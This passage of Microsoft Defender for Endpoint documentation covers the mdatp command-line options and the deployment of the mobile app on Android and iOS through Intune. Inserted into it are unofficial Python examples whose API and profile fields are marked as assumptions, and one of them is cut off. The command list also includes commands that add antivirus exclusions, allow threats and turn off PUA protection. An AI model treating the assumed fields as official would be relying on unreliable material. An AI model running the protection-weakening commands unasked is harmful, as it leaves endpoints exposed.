    mdatp config cloud --value [enabled|disabled]

Configuration | Turn on/off product diagnostics
    mdatp config cloud-diagnostic --value [enabled|disabled]

Configuration | Turn on/off automatic sample submission
    mdatp config cloud-automatic-sample-submission --value [enabled|disabled]

Configuration | Turn on/off AV passive mode
    mdatp config passive-mode --value [enabled|disabled]

Configuration | Add/remove an antivirus exclusion for a file extension
    mdatp exclusion extension [add|remove] --name [extension]

Configuration | Add/remove an antivirus exclusion for a file
    mdatp exclusion file [add|remove] --path [path-to-file]

Configuration | Add/remove an antivirus exclusion for a directory
    mdatp exclusion folder [add|remove] --path [path-to-directory]

Configuration | Add/remove an antivirus exclusion for a process
    mdatp exclusion process [add|remove] --path [path-to-process]
    mdatp exclusion process [add|remove] --name [process-name]

Configuration | List all antivirus exclusions
    mdatp exclusion list

Configuration | Add a threat name to the allowed list
    mdatp threat allowed add --name [threat-name]

Configuration | Remove a threat name from the allowed list
    mdatp threat allowed remove --name [threat-name]

Configuration | List all allowed threat names
    mdatp threat allowed list

Configuration | Turn on PUA protection
    mdatp threat policy set --type potentially_unwanted_application --action block

Configuration | Turn off PUA protection
    mdatp threat policy set --type potentially_unwanted_application --action off

Configuration | Turn on audit mode for PUA protection
    mdatp threat policy set --type potentially_unwanted_application --action audit

Configuration | Configure degree of parallelism for on-demand scans
    mdatp config maximum-on-demand-scan-threads --value [numerical-value-between-1-and-64]

Configuration | Turn on/off scans after security intelligence updates
    mdatp config scan-after-definition-update --value [enabled/disabled]

Configuration | Turn on/off archive scanning (on-demand scans only)
    mdatp config scan-archives --value [enabled/disabled]

Configuration | Turn on/off file hash computation
    mdatp config enable-file-hash-computation --value [enabled/disabled]

Diagnostics | Change the log level
    mdatp log level set --level [error|warning|info|verbose]

Diagnostics | Generate diagnostic logs
    mdatp diagnostic create --path [directory]

Diagnostics | Size limits for retained product logs
    mdatp config log-rotation-parameters [max-current-size/max-rotated-size] --size [value in MB]

Health | Check the product's health
    mdatp health

Protection | Scan a path
    mdatp scan custom --path [path] [--ignore-exclusions]

Protection | Do a quick scan
    mdatp scan quick

Protection | Do a full scan
    mdatp scan full

Protection | Cancel an ongoing on-demand scan
    mdatp scan cancel

Protection | Request a security intelligence update
    mdatp definitions update

Protection | Print the full protection history
    mdatp threat list

Protection | Get threat details
    mdatp threat get --id [threat-id]

Quarantine management | List all quarantined files
    mdatp threat quarantine list

Quarantine management | Remove all files from the quarantine
    mdatp threat quarantine remove-all

Quarantine management | Add a file detected as a threat to the quarantine
    mdatp threat quarantine add --id [threat-id]

Quarantine management | Remove a file detected as a threat from the quarantine
    mdatp threat quarantine remove --id [threat-id]

Quarantine management | Restore a file from the quarantine. Available in Defender for
Endpoint versions lower than 101.23092.0012.
    mdatp threat quarantine restore --id [threat-id] --path [destination-folder]

Quarantine management | Restore a file from the quarantine with Threat ID. Available in
Defender for Endpoint version 101.23092.0012 or higher.
    mdatp threat quarantine restore threat-id --id [threat-id] --destination-path [destination-folder]

Quarantine management | Restore a file from the quarantine with Threat Original Path.
Available in Defender for Endpoint version 101.23092.0012 or higher.
    mdatp threat quarantine restore threat-path --path [threat-original-path] --destination-path [destination-folder]

Endpoint Detection and Response | Set early preview
    mdatp edr early-preview [enabled|disabled]

Endpoint Detection and Response | Set group-id
    mdatp edr group-ids --group-id [group-id]

Endpoint Detection and Response | Set / remove tag, only GROUP supported
    mdatp edr tag set --name GROUP --value [tag]

Endpoint Detection and Response | List exclusions (root)
    mdatp edr exclusion list [processes|paths|extensions|all]

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.



Microsoft Defender for Endpoint - Mobile Threat Defense
Article • 01/29/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint on Android and iOS is our mobile threat defense (MTD)
solution. Typically, companies are proactive in protecting PCs from vulnerabilities and
attacks, while mobile devices often go unmonitored and unprotected. Although mobile
platforms have built-in protection such as app isolation and vetted consumer app
stores, they remain vulnerable to web-based or other sophisticated attacks. As more
employees use mobile devices for work and to access sensitive information, it's
imperative that companies deploy an MTD solution to protect those devices and your
resources from increasingly sophisticated attacks on mobiles.

Key capabilities

Microsoft Defender for Endpoint on Android and iOS provides the following key
capabilities. For information about the latest features and benefits, read our
announcements.

Web Protection
    Anti-phishing, blocking unsafe network connections, and support for custom
    indicators for URLs and domains. (File and IP indicators are not currently
    supported.)

Malware Protection (Android-only)
    Scanning for malicious apps.

Jailbreak Detection (iOS-only)
    Detection of jailbroken devices.

Microsoft Defender Vulnerability Management (MDVM)
    Vulnerability assessment of onboarded mobile devices. Includes OS and apps
    vulnerability assessment for both Android and iOS. Visit this page to learn more
    about Microsoft Defender Vulnerability Management in Microsoft Defender for
    Endpoint.

Network Protection
    Protection against rogue Wi-Fi related threats and rogue certificates; ability to
    allow list the root CA and private root CA certificates in Intune; establish trust
    with endpoints.

Unified alerting
    Alerts from all platforms in the unified M365 security console.

Conditional Access, Conditional launch
    Blocking risky devices from accessing corporate resources. Defender for Endpoint
    risk signals can also be added to app protection policies (MAM).

Privacy Controls
    Configure privacy in the threat reports by controlling the data sent by Microsoft
    Defender for Endpoint. Privacy controls are available for admins and end users, for
    enrolled and unenrolled devices alike.

Integration with Microsoft Tunnel
    Integration with Microsoft Tunnel, a VPN gateway solution to enable security and
    connectivity in a single app. Available on both Android and iOS.

All these capabilities are available for Microsoft Defender for Endpoint license holders.
For more information, see Licensing requirements.

Overview and Deploy

Deployment of Microsoft Defender for Endpoint on mobile can be done via Microsoft
Intune. Watch this video for a quick overview of MTD capabilities and deployment:

https://www.microsoft.com/en-us/videoplayer/embed/RWMpiC?postJsllMsg=true

Deploy

The following table summarizes how to deploy Microsoft Defender for Endpoint on
Android and iOS. For detailed documentation, see

- Overview of Microsoft Defender for Endpoint on Android, and
- Overview of Microsoft Defender for Endpoint on iOS

Android

Android Enterprise with Intune enrolled devices
    Deploy on Android Enterprise

Device Administrator with Intune enrolled devices
    Deploy on Device Administrator

Unmanaged BYOD or devices managed by other enterprise mobility management / Set up
app protection policy (MAM)
    Configure Defender risk signals in app protection policy (MAM)

iOS

Supervised devices with Intune
    1. Deploy as iOS store app
    2. Set up Web Protection without VPN for supervised iOS devices

Unsupervised (BYOD) devices enrolled with Intune
    Deploy as iOS store app

Unmanaged BYOD or devices managed by other enterprise mobility management / Set up
app protection policy (MAM)
    Configure Defender risk signals in app protection policy (MAM)

End-user onboarding

- Configure Zero-touch onboarding for iOS enrolled devices: Admins can configure
  zero-touch install to silently onboard Microsoft Defender for Endpoint on enrolled
  iOS devices without requiring the user to open the app.

- Configure Conditional Access to enforce user onboarding: This can be applied to
  ensure end users onboard to the Microsoft Defender for Endpoint app after
  deployment. Watch this video for a quick demo on configuring conditional access
  with Defender for Endpoint risk signals.

https://www.microsoft.com/en-us/videoplayer/embed/RWMwR1?postJsllMsg=true

Simplify Onboarding

- iOS - Zero-Touch Onboard
- Android Enterprise - Set up Always-on VPN
- iOS - Auto-setup of VPN profile

Pilot evaluation
While evaluating mobile threat defense with Microsoft Defender for Endpoint, you can
verify that certain criteria is met before proceeding to deploy the service to a larger set
of devices. You can define the exit criteria and ensure that they're satisfied before
deploying widely.

This helps reduce potential issues that could arise while rolling out the service. Here are
some tests and exit criteria that might help:

Devices show up in the device inventory list: After successful onboarding of


Defender for Endpoint on the mobile device, verify that the device is listed in the
Device Inventory in the security console .

Run a malware detection test on an Android device: Install any test virus app from
the Google play store and verify that it gets detected by Microsoft Defender for
Endpoint. Here's an example app that can be used for this test: Test virus . Note
that on Android Enterprise with a work profile, only the work profile is supported.

Run a phishing test: Browse to https://smartscreentestratings2.net and verify
that it gets blocked by Microsoft Defender for Endpoint. Note that on Android
Enterprise with a work profile, only the work profile is supported.

Alerts appear in dashboard: Verify that alerts for the above detection tests appear in
the security console.
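The exit criteria above can be checked mechanically once the pilot ring has run the detection tests. The following is an added example, not part of Microsoft's documentation: it evaluates the criteria (every pilot device present, active and onboarded in the device inventory; a malware alert and a phishing alert for Android test devices, a phishing alert for iOS test devices) over records shaped like the Defender for Endpoint API's machines and alerts collections. The field names used (computerDnsName, osPlatform, healthStatus, onboardingStatus, machineId, title) are assumptions about that API, and the sample records are constructed.

```python
"""Pilot exit-criteria check for a Defender for Endpoint mobile rollout.

Added example, not Microsoft's code. Field names are assumed to follow the
Defender for Endpoint API machines/alerts collections; records are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass

# Constructed sample of a machines collection for a pilot ring (assumed field names).
SAMPLE_MACHINES = [
    {"id": "m-android-01", "computerDnsName": "pixel-pilot-01", "osPlatform": "Android",
     "healthStatus": "Active", "onboardingStatus": "Onboarded"},
    {"id": "m-ios-01", "computerDnsName": "iphone-pilot-01", "osPlatform": "iOS",
     "healthStatus": "Active", "onboardingStatus": "Onboarded"},
    {"id": "m-ios-02", "computerDnsName": "iphone-pilot-02", "osPlatform": "iOS",
     "healthStatus": "Inactive", "onboardingStatus": "Onboarded"},
]

# Constructed sample of alerts raised by the test detections (assumed field names).
SAMPLE_ALERTS = [
    {"id": "a-1", "machineId": "m-android-01", "title": "Malware was detected on the device"},
    {"id": "a-2", "machineId": "m-ios-01", "title": "Phishing site blocked by Web Protection"},
    {"id": "a-3", "machineId": "m-ios-02", "title": "Phishing site blocked by Web Protection"},
]

# Which test alerts each platform must have produced (keyword matched in the alert title).
# Constructed mapping: Android pilots run the malware and phishing tests, iOS the phishing test.
REQUIRED_TESTS = {"Android": ["malware", "phishing"], "iOS": ["phishing"]}


@dataclass
class PilotReport:
    missing_devices: list[str]               # not in the device inventory at all
    inactive_devices: list[str]              # present but not Active/Onboarded
    devices_without_alert: dict[str, list[str]]  # device -> test alerts not seen

    @property
    def passed(self) -> bool:
        return not (self.missing_devices or self.inactive_devices or self.devices_without_alert)


def evaluate_pilot(pilot_devices: list[str], machines: list[dict], alerts: list[dict],
                   required_tests: dict[str, list[str]]) -> PilotReport:
    """Apply the exit criteria to the pilot device names and return what is still open."""
    by_name = {m["computerDnsName"]: m for m in machines}

    missing = [d for d in pilot_devices if d not in by_name]
    inactive = [
        d for d in pilot_devices if d in by_name
        and (by_name[d]["healthStatus"] != "Active" or by_name[d]["onboardingStatus"] != "Onboarded")
    ]

    # Index alert titles by machine id so each device is checked against its own alerts.
    titles_by_machine: dict[str, list[str]] = {}
    for alert in alerts:
        titles_by_machine.setdefault(alert["machineId"], []).append(alert["title"].lower())

    without: dict[str, list[str]] = {}
    for d in pilot_devices:
        machine = by_name.get(d)
        if machine is None:
            continue  # already reported as missing
        titles = titles_by_machine.get(machine["id"], [])
        lacking = [t for t in required_tests.get(machine["osPlatform"], [])
                   if not any(t in title for title in titles)]
        if lacking:
            without[d] = lacking
    return PilotReport(missing, inactive, without)


def run_sample() -> PilotReport:
    """Evaluate the constructed pilot: one device missing, one inactive, one lacking a phishing alert."""
    pilot = ["pixel-pilot-01", "pixel-pilot-02", "iphone-pilot-01", "iphone-pilot-02"]
    return evaluate_pilot(pilot, SAMPLE_MACHINES, SAMPLE_ALERTS, REQUIRED_TESTS)


if __name__ == "__main__":
    report = run_sample()
    print("passed" if report.passed else "open items:", report)
```

The report separates "never showed up" from "showed up but is not healthy" because the remediation differs: a missing device points at the app assignment or enrollment, an inactive one at the device's sync or sign-in. Feed it the real collections exported from the portal or API instead of the constructed samples when running the pilot.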

Need help in deploying or configuring Defender for Endpoint on Android & iOS? If you
have at least 150 licenses for the product, use your FastTrack benefits. Learn more about
FastTrack at Microsoft FastTrack.

Configure
Configure Android features
Configure iOS features
Configure Web Protection without VPN for supervised iOS devices

Resources
Microsoft Defender for Endpoint on Android
Microsoft Defender for Endpoint on iOS
Stay informed about upcoming releases by reading our announcements.

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Deploy Microsoft Defender for Endpoint
on Android with Microsoft Intune
Article • 03/08/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Learn how to deploy Defender for Endpoint on Android on Microsoft Intune Company
Portal enrolled devices. For more information about Microsoft Intune device enrollment,
see Enroll your device.

Note

Defender for Endpoint on Android is now available on Google Play

You can connect to Google Play from Microsoft Intune to deploy Defender for
Endpoint app across Device Administrator and Android Enterprise enrollment
modes.

Updates to the app are automatic via Google Play.

Deploy on Device Administrator enrolled devices
Learn how to deploy Defender for Endpoint on Android with Microsoft Intune Company
Portal - Device Administrator enrolled devices.

Add as Android store app

1. In the Microsoft Intune admin center, go to Apps > Android Apps > Add >
Android store app and choose Select.

2. On the Add app page and in the App Information section enter:

Name
Description
Publisher as Microsoft.
App store URL as https://play.google.com/store/apps/details?
id=com.microsoft.scmx (Defender for Endpoint app Google Play Store URL)

Other fields are optional. Select Next.

3. In the Assignments section, go to the Required section and select Add group. You
can then choose the user group(s) that you would like to target Defender for
Endpoint on Android app. Choose Select and then Next.

Note

The selected user group should consist of Intune enrolled users.

4. In the Review+Create section, verify that all the information entered is correct and
then select Create.

In a few moments, the Defender for Endpoint app is created, and a notification
shows up at the top-right corner of the page.

5. In the app information page that is displayed, in the Monitor section, select Device
install status to verify that the device installation has completed successfully.

Complete onboarding and check status


1. Once Defender for Endpoint on Android has been installed on the device, you'll
see the app icon.

2. Tap the Microsoft Defender for Endpoint app icon and follow the on-screen
instructions to complete onboarding the app. The details include end-user
acceptance of Android permissions required by Defender for Endpoint on Android.

3. Upon successful onboarding, the device will start showing up on the Devices list in
the Microsoft Defender portal.

Deploy on Android Enterprise enrolled devices

Defender for Endpoint on Android supports Android Enterprise enrolled devices.

For more information on the enrollment options supported by Microsoft Intune, see
Enrollment Options.

Currently, Personally owned devices with work profile and Corporate-owned fully
managed user device enrollments are supported for deployment.

Add Microsoft Defender for Endpoint on Android as a Managed Google Play app

Follow the steps below to add the Microsoft Defender for Endpoint app to your managed
Google Play.

1. In the Microsoft Intune admin center, go to Apps > Android Apps > Add and select
Managed Google Play app.

2. On your managed Google Play page that loads subsequently, go to the search box
and enter Microsoft Defender. Your search should display the Microsoft Defender
for Endpoint app in your Managed Google Play. Click on the Microsoft Defender
for Endpoint app from the Apps search result.

3. In the App description page that comes up next, you should be able to see app
details on Defender for Endpoint. Review the information on the page and then
select Approve.

4. You'll be presented with the permissions that Defender for Endpoint obtains for it
to work. Review them and then select Approve.

5. You'll be presented with the Approval settings page. The page confirms your
preference to handle new app permissions that Defender for Endpoint on Android
might ask. Review the choices and select your preferred option. Select Done.

By default, managed Google Play selects Keep approved when app requests new
permissions.

6. After the permissions handling selection is made, select Sync to sync Microsoft
Defender for Endpoint to your apps list.

7. The sync will complete in a few minutes.

8. Select the Refresh button in the Android apps screen and Microsoft Defender for
Endpoint should be visible in the apps list.

9. Defender for Endpoint supports App configuration policies for managed devices
via Microsoft Intune. This capability can be leveraged to select different
configurations for Defender.

a. In the Apps page, go to Policy > App configuration policies > Add > Managed
devices.

b. In the Create app configuration policy page, enter the following details:

Name: Microsoft Defender for Endpoint.
Choose Android Enterprise as platform.
Choose Personally-owned Work Profile only or Fully Managed,
Dedicated, and Corporate-owned work profile only as Profile Type.
Click Select App, choose Microsoft Defender, select OK and then Next.

c. Select Permissions > Add. From the list, select the available app permissions >
OK.

d. Select an option for each permission to grant with this policy:

Prompt - Prompts the user to accept or deny.
Auto grant - Automatically approves without notifying the user.
Auto deny - Automatically denies without notifying the user.

e. Go to the Configuration settings section and choose 'Use configuration
designer' in Configuration settings format.

f. Click on Add to view a list of supported configurations. Select the required
configuration and click on OK.

g. You should see all the selected configurations listed. You can change the
configuration value as required and then select Next.


h. In the Assignments page, select the user group to which this app config policy
should be assigned. Click Select groups to include, select the applicable
group, and then select Next. The group selected here is usually the same
group to which you would assign the Microsoft Defender for Endpoint Android app.

i. In the Review + Create page that comes up next, review all the information and
then select Create.

The app configuration policy for Defender for Endpoint is now assigned to the
selected user group.

10. Select Microsoft Defender app in the list > Properties > Assignments > Edit.

11. Assign the app as a Required app to a user group. It is automatically installed in the
work profile during the next sync of the device via the Company Portal app. This
assignment can be done by navigating to the Required section > Add group,
selecting the user group, and clicking Select.

12. In the Edit Application page, review all the information that was entered above.
Then select Review + Save and then Save again to commence assignment.

Auto Setup of Always-on VPN

Defender for Endpoint supports Device configuration policies for managed devices via
Microsoft Intune. This capability can be used to automatically set up Always-on VPN on
Android Enterprise enrolled devices, so the end user does not need to set up the VPN
service while onboarding.

1. On Devices, select Configuration Profiles > Create Profile > Platform > Android
Enterprise.

Select Device restrictions under one of the following, based on your device
enrollment type:

Fully Managed, Dedicated, and Corporate-Owned Work Profile
Personally owned Work Profile

Select Create.

2. Configuration Settings: Provide a Name and a Description to uniquely identify the
configuration profile.

3. Select Connectivity and configure VPN:

Enable Always-on VPN

Set up a VPN client in the work profile to automatically connect and
reconnect to the VPN whenever possible. Only one VPN client can be
configured for always-on VPN on a given device, so be sure to have no more
than one always-on VPN policy deployed to a single device.

Select Custom in the VPN client dropdown list

Custom VPN in this case is the Defender for Endpoint VPN, which is used to
provide the Web Protection feature.

Note

The Microsoft Defender for Endpoint app must be installed on the user's device
for auto setup of this VPN to work.

Enter the Package ID of the Microsoft Defender for Endpoint app in the Google Play
store. For the Defender app URL https://play.google.com/store/apps/details?
id=com.microsoft.scmx, the Package ID is com.microsoft.scmx

Lockdown mode: Not configured (Default)


4. Assignment

In the Assignments page, select the user group to which this profile
should be assigned. Choose Select groups to include, select the applicable
group, and then select Next. The group selected here is usually the same group to
which you would assign the Microsoft Defender for Endpoint Android app.

5. In the Review + Create page that comes up next, review all the information and
then select Create. The device configuration profile is now assigned to the selected
user group.

Check status and complete onboarding

1. Confirm the installation status of Microsoft Defender for Endpoint on Android by
clicking on the Device Install Status. Verify that the device is displayed here.

2. On the device, you can validate the onboarding status by going to the work
profile. Confirm that Defender for Endpoint is available and that you are enrolled
to the Personally owned devices with work profile. If you are enrolled to a
Corporate-owned, fully managed user device, you will have a single profile on the
device where you can confirm that Defender for Endpoint is available.

3. When the app is installed, open the app and accept the permissions and then your
onboarding should be successful.

4. At this stage the device is successfully onboarded onto Defender for Endpoint on
Android. You can verify this on the Microsoft Defender portal by navigating to
the Device Inventory page.

Set up Microsoft Defender in Personal Profile on Android Enterprise in BYOD mode

Admins can go to the Microsoft Endpoint Management admin center to set up and
configure Microsoft Defender support in personal profiles by following these steps:

1. Go to Apps > App configuration policies and click on Add. Select Managed
Devices.

2. Enter Name and Description to uniquely identify the configuration policy. Select
platform as 'Android Enterprise', Profile type as 'Personally-owned work profile
only' and Targeted app as 'Microsoft Defender'.
3. On the settings page, in 'Configuration settings format', select 'Use configuration
designer' and click on Add. From the list of configurations that are displayed,
select 'Microsoft Defender in Personal profile'.

4. The selected configuration will be listed. Change the configuration value to 1 to
enable Microsoft Defender support in personal profiles. A notification will appear
informing the admin about the same. Click on Next.

5. Assign the configuration policy to a group of users. Review and create the policy.

Admins can also set up privacy controls from the Microsoft Intune admin center to
control what data can be sent by the Defender mobile client to the security portal. For
more information, see configuring privacy controls.

Organizations can communicate to their users to protect Personal profile with Microsoft
Defender on their enrolled BYOD devices.

Pre-requisite: Microsoft Defender must already be installed and active in the work
profile to enable Microsoft Defender in personal profiles.

To complete onboarding a device

1. Install the Microsoft Defender application in a personal profile with a personal
Google Play store account.
2. Install the Company portal application on personal profile. No sign-in is required.
3. When a user launches the application, they'll see the sign-in screen. Log in using
a corporate account only.
4. On a successful login, users will see the following screens:
a. EULA screen: Presented only if the user has not consented already in the Work
profile.
b. Notice screen: Users need to provide consent on this screen to move forward
with onboarding the application. This is required only during the first run of the
app.
5. Provide the required permissions to complete onboarding.

Note

Pre-requisite:

1. The Company portal needs to be enabled on the personal profile.
2. Microsoft Defender needs to be already installed and active in the work profile.

Related topics
Overview of Microsoft Defender for Endpoint on Android
Configure Microsoft Defender for Endpoint on Android features

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Deploy Microsoft Defender for Endpoint
on iOS with Microsoft Intune
Article • 11/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

This topic describes deploying Defender for Endpoint on iOS on Microsoft Intune
Company Portal enrolled devices. For more information about Microsoft Intune device
enrollment, see Enroll iOS/iPadOS devices in Intune.

Before you begin

Ensure you have access to the Microsoft Intune admin center.

Ensure iOS enrollment is done for your users. Users need to have a Defender for
Endpoint license assigned in order to use Defender for Endpoint on iOS. Refer to
Assign licenses to users for instructions on how to assign licenses.

Ensure the end users have the Company Portal app installed, are signed in, and have completed
enrollment.

Note

Microsoft Defender for Endpoint on iOS is available in the Apple App Store.

This section covers:

1. Deployment steps (applicable for both Supervised and Unsupervised devices) -
Admins can deploy Defender for Endpoint on iOS via Microsoft Intune Company
Portal. This step is not needed for VPP (volume purchase) apps.

2. Complete deployment (only for Supervised devices)- Admins can select to deploy
any one of the given profiles.
a. Zero touch (Silent) Control Filter - Provides Web Protection without the local
loopback VPN and also enables silent onboarding for users. App is
automatically installed and activated without the need for user to open the app.
b. Control Filter - Provides Web Protection without the local loopback VPN.

3. Automated Onboarding setup (only for Unsupervised devices) - Admins can
automate the Defender for Endpoint onboarding for users in two different ways:
a. Zero touch (Silent) Onboarding - App is automatically installed and activated
without the need for users to open the app.
b. Auto Onboarding of VPN - Defender for Endpoint VPN profile is automatically
set up without having the user to do so during onboarding. This step is not
recommended in Zero touch configurations.

4. User Enrollment setup (only for Intune User Enrolled devices) - Admins can deploy
and configure the Defender for Endpoint app on the Intune User Enrolled devices
also.

5. Complete onboarding and check status - This step is applicable for all enrollment
types to ensure app is installed on the device, onboarding is completed and device
is visible in the Microsoft Defender portal. It can be skipped for the zero touch
(silent) onboarding.

Deployment steps (applicable for both Supervised and Unsupervised devices)

Deploy Defender for Endpoint on iOS via Microsoft Intune Company Portal.

Add iOS store app

1. In the Microsoft Intune admin center, go to Apps > iOS/iPadOS > Add > iOS
store app and click Select.

2. On the Add app page, click on Search the App Store and type Microsoft Defender
in the search bar. In the search results section, click on Microsoft Defender and click
Select.

3. Select iOS 15.0 as the Minimum operating system. Review the rest of information
about the app and click Next.

4. In the Assignments section, go to the Required section and select Add group. You
can then choose the user group(s) that you would like to target Defender for
Endpoint on iOS app. Click Select and then Next.

Note

The selected user group should consist of Microsoft Intune enrolled users.

5. In the Review + Create section, verify that all the information entered is correct and
then select Create. In a few moments, the Defender for Endpoint app should be
created successfully, and a notification should show up at the top-right corner of
the page.
6. In the app information page that is displayed, in the Monitor section, select Device
install status to verify that the device installation has completed successfully.

Complete deployment for supervised devices

The Microsoft Defender for Endpoint on iOS app has specialized ability on supervised
iOS/iPadOS devices, given the increased management capabilities provided by the
platform on these types of devices. It can also provide Web Protection without setting
up a local VPN on the device. This gives end-users a seamless experience while still
being protected from phishing and other web-based attacks.

Admins can use the following steps to configure supervised devices.

Configure Supervised Mode via Microsoft Intune

Configure the supervised mode for Defender for Endpoint app through an App
configuration policy and Device configuration profile.

App configuration policy

Note

This app configuration policy for supervised devices is applicable only to managed
devices and should be targeted at ALL managed iOS devices as a best practice.

1. Sign in to the Microsoft Intune admin center and go to Apps > App
configuration policies > Add. Select Managed devices.

2. In the Create app configuration policy page, provide the following information:

Policy Name
Platform: Select iOS/iPadOS
Targeted app: Select Microsoft Defender for Endpoint from the list

3. In the next screen, select Use configuration designer as the format. Specify the
following properties:

Configuration Key: issupervised
Value type: String
Configuration Value: {{issupervised}}

4. Select Next to open the Scope tags page. Scope tags are optional. Select Next to
continue.

5. On the Assignments page, select the groups that will receive this profile. For this
scenario, it is best practice to target All Devices. For more information on
assigning profiles, see Assign user and device profiles.

When deploying to user groups, a user must sign in to a device before the policy
applies.

Click Next.

6. On the Review + create page, when you're done, choose Create. The new profile is
displayed in the list of configuration profiles.

Device configuration profile (Control Filter)

Note

For devices that run iOS/iPadOS in Supervised Mode, there is a custom
.mobileconfig profile, called the ControlFilter profile, available. This profile enables
Web Protection without setting up the local loopback VPN on the device. This
gives end-users a seamless experience while still being protected from phishing
and other web-based attacks.

However, the ControlFilter profile does not work with Always-On VPN (AOVPN)
due to platform restrictions.
Admins deploy any one of the given profiles.

1. Zero touch (Silent) Control Filter - This profile enables silent onboarding for users.
Download the config profile from ControlFilterZeroTouch.

2. Control Filter - Download the config profile from ControlFilter.

Once the profile has been downloaded, deploy the custom profile. Follow the steps
below:

1. Navigate to Devices > iOS/iPadOS > Configuration profiles > Create Profile.

2. Select Profile Type > Templates and Template name > Custom.

3. Provide a name for the profile. When prompted to import a Configuration profile
file, select the one downloaded in the previous step.

4. In the Assignment section, select the device group to which you want to apply this
profile. As a best practice, this should be applied to all managed iOS devices.
Select Next.

Note

Device Group creation is supported in both Defender for Endpoint Plan 1 and
Plan 2.

5. On the Review + create page, when you're done, choose Create. The new profile is
displayed in the list of configuration profiles.

Automated Onboarding setup (only for Unsupervised devices)

Admins can automate the Defender onboarding for users in two different ways, with
Zero touch (Silent) Onboarding or Auto Onboarding of VPN.

Zero-touch (Silent) onboarding of Microsoft Defender for Endpoint

Note

Zero-touch cannot be configured on iOS devices that are enrolled without user
affinity (user-less devices or shared devices).

Admins can configure Microsoft Defender for Endpoint to deploy and activate silently. In
this flow, the administrator creates a deployment profile and the user is simply notified
of the installation. Defender for Endpoint is automatically installed without the need for
the user to open the app. Follow the steps below to set up zero-touch or silent
deployment of Defender for Endpoint on enrolled iOS devices:

1. In the Microsoft Intune admin center, go to Devices > Configuration Profiles >
Create Profile.

2. Choose Platform as iOS/iPadOS, Profile type as Templates and Template name as
VPN. Select Create.

3. Type a name for the profile and select Next.

4. Select Custom VPN for Connection Type and in the Base VPN section, enter the
following:

Connection Name = Microsoft Defender for Endpoint
VPN server address = 127.0.0.1
Auth method = "Username and password"
Split Tunneling = Disable
VPN identifier = com.microsoft.scmx
In the key-value pairs, enter the key SilentOnboard and set the value to True.
Type of Automatic VPN = On-demand VPN
Select Add for On Demand Rules and select I want to do the following =
Connect VPN, I want to restrict to = All domains.

To mandate that the VPN can't be disabled on the user's device, admins can select Yes
for Block users from disabling automatic VPN. By default, it's not
configured and users can disable the VPN only in Settings.
To allow users to change the VPN toggle from within the app, add
EnableVPNToggleInApp = TRUE in the key-value pairs. By default, users
can't change the toggle from within the app.

5. Select Next and assign the profile to targeted users.

6. In the Review + Create section, verify that all the information entered is correct and
then select Create.
Once the above configuration is done and synced with the device, the following actions
take place on the targeted iOS device(s):

Microsoft Defender for Endpoint will be deployed and silently onboarded and the
device will be seen in the Defender for Endpoint portal.
A provisional notification will be sent to the user device.
Web Protection and other features will be activated.

Note

For supervised devices, admins can set up Zero touch onboarding with the new
ZeroTouch Control Filter Profile.

The Defender for Endpoint VPN Profile will not be installed on the device, and Web
protection will be provided by the Control Filter Profile.

Auto-Onboarding of VPN profile (Simplified Onboarding)

Note

This step simplifies the onboarding process by setting up the VPN profile. If you are
using Zero touch, you do not need to perform this step.

For unsupervised devices, a VPN is used to provide the Web Protection feature. This is
not a regular VPN and is a local/self-looping VPN that does not take traffic outside the
device.

Admins can configure auto-setup of VPN profile. This will automatically set up the
Defender for Endpoint VPN profile without having the user to do so while onboarding.

1. In the Microsoft Intune admin center, go to Devices > Configuration Profiles >
Create Profile.

2. Choose Platform as iOS/iPadOS and Profile type as VPN. Click Create.

3. Type a name for the profile and click Next.

4. Select Custom VPN for Connection Type and in the Base VPN section, enter the
following:

Connection Name = Microsoft Defender for Endpoint
VPN server address = 127.0.0.1
Auth method = "Username and password"
Split Tunneling = Disable
VPN identifier = com.microsoft.scmx
In the key-value pairs, enter the key AutoOnboard and set the value to True.
Type of Automatic VPN = On-demand VPN
Select Add for On Demand Rules and select I want to do the following =
Connect VPN, I want to restrict to = All domains.

To require that the VPN cannot be disabled on a user's device, admins can select
Yes for Block users from disabling automatic VPN. By default, this setting is
not configured and users can disable the VPN only in Settings.

To allow users to change the VPN toggle from within the app, add
EnableVPNToggleInApp = TRUE in the key-value pairs. By default, users
cannot change the toggle from within the app.

5. Click Next and assign the profile to targeted users.

6. In the Review + Create section, verify that all the information entered is correct and
then select Create.
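Both the Zero-touch profile (SilentOnboard) and the Auto-Onboarding profile (AutoOnboard) above describe the same VPN payload with one differing key, and the property that matters for review is that the "VPN" is a local loopback that never carries traffic off the device. The following is an added example, not Microsoft's or Intune's code: it renders that payload as an Apple VPN configuration profile (PayloadType com.apple.vpn.managed) and then checks a profile the way a reviewer would, flagging a non-loopback server address, a provider other than com.microsoft.scmx, a missing or doubled onboarding key, and a missing on-demand Connect rule. It assumes that Intune's "Custom VPN" maps to VPNType "VPN" with the app bundle id as VPNSubType and that its key-value pairs land in the VendorConfig dictionary; the UUIDs and the misconfigured sample are generated here.

```python
"""Render and check the Defender for Endpoint local loopback VPN profile.

Added example, not Microsoft's or Intune's code. Assumes Intune's Custom VPN
becomes VPNType "VPN" / VPNSubType bundle id and key-value pairs go to VendorConfig.
"""
from __future__ import annotations

import ipaddress
import plistlib
import uuid

DEFENDER_BUNDLE_ID = "com.microsoft.scmx"   # VPN identifier from the steps above
LOOPBACK_ADDRESS = "127.0.0.1"               # VPN server address from the steps above


def build_vpn_payload(connection_name: str, onboarding_key: str,
                      allow_toggle_in_app: bool = False) -> dict:
    """One VPN payload carrying the settings entered in Intune for the given onboarding mode."""
    if onboarding_key not in ("SilentOnboard", "AutoOnboard"):
        raise ValueError("onboarding_key must be SilentOnboard or AutoOnboard")
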